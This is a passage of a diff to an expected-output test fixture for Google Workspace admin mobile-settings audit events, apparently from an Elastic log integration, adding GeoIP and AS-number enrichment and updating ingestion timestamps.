"user": { "name": "foo", "id": "1", 
@@ -112,7 +136,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977336100Z", + "ingested": "2021-12-14T14:44:42.510362055Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ACTION_REQUESTED", @@ -168,6 +192,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -177,7 +213,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:46.977342Z", + "ingested": "2021-12-14T14:44:42.510362526Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ADD_MOBILE_CERTIFICATE", 
@@ -232,6 +268,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -241,7 +289,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977346Z",
+ "ingested": "2021-12-14T14:44:42.510362909Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}",
 "provider": "admin",
 "action": "COMPANY_DEVICES_BULK_CREATION",
@@ -296,6 +344,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -305,7 +365,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977351400Z",
+ "ingested": "2021-12-14T14:44:42.510363309Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_OWNED_DEVICE_BLOCKED",
@@ -360,6 +420,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -369,7 +441,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977356500Z",
+ "ingested": "2021-12-14T14:44:42.510363699Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_DEVICE_DELETION",
@@ -424,6 +496,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -433,7 +517,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977362400Z",
+ "ingested": "2021-12-14T14:44:42.510364065Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_OWNED_DEVICE_UNBLOCKED",
@@ -488,6 +572,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -497,7 +593,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977367Z",
+ "ingested": "2021-12-14T14:44:42.510364436Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_OWNED_DEVICE_WIPED",
@@ -552,6 +648,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -561,7 +669,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977371900Z",
+ "ingested": "2021-12-14T14:44:42.510364806Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT",
@@ -616,6 +724,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -625,7 +745,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977408Z",
+ "ingested": "2021-12-14T14:44:42.510365176Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER",
@@ -680,6 +800,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -689,7 +821,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977440Z",
+ "ingested": "2021-12-14T14:44:42.510365549Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
 "provider": "admin",
 "action": "REMOVE_MOBILE_APPLICATION_FROM_WHITELIST",
@@ -744,6 +876,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -753,7 +897,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977446700Z",
+ "ingested": "2021-12-14T14:44:42.510366124Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_APPLICATION_SETTINGS",
@@ -809,6 +953,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -818,7 +974,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977455100Z",
+ "ingested": "2021-12-14T14:44:42.510366510Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
 "provider": "admin",
 "action": "ADD_MOBILE_APPLICATION_TO_WHITELIST",
@@ -873,6 +1029,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -882,7 +1050,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977475700Z",
+ "ingested": "2021-12-14T14:44:42.510366874Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOBILE_DEVICE_APPROVE",
@@ -938,6 +1106,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -947,7 +1127,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977481300Z",
+ "ingested": "2021-12-14T14:44:42.510367233Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOBILE_DEVICE_BLOCK",
@@ -1003,6 +1183,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1012,7 +1204,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977512300Z",
+ "ingested": "2021-12-14T14:44:42.510367597Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOBILE_DEVICE_DELETE",
@@ -1068,6 +1260,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1077,7 +1281,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977517500Z",
+ "ingested": "2021-12-14T14:44:42.510368115Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOBILE_DEVICE_WIPE",
@@ -1133,6 +1337,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1142,7 +1358,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977521800Z",
+ "ingested": "2021-12-14T14:44:42.510368494Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_SETTING",
@@ -1198,6 +1414,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1207,7 +1435,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977526700Z",
+ "ingested": "2021-12-14T14:44:42.510368858Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "CHANGE_ADMIN_RESTRICTIONS_PIN",
@@ -1262,6 +1490,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1271,7 +1511,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977532400Z",
+ "ingested": "2021-12-14T14:44:42.510369220Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_WIRELESS_NETWORK",
@@ -1326,6 +1566,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1335,7 +1587,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977538100Z",
+ "ingested": "2021-12-14T14:44:42.510369589Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "ADD_MOBILE_WIRELESS_NETWORK",
@@ -1390,6 +1642,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1399,7 +1663,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977559600Z",
+ "ingested": "2021-12-14T14:44:42.510369953Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "REMOVE_MOBILE_WIRELESS_NETWORK",
@@ -1454,6 +1718,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1463,7 +1739,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977649400Z",
+ "ingested": "2021-12-14T14:44:42.510370325Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD",
@@ -1518,6 +1794,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1527,7 +1815,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977654100Z",
+ "ingested": "2021-12-14T14:44:42.510370809Z",
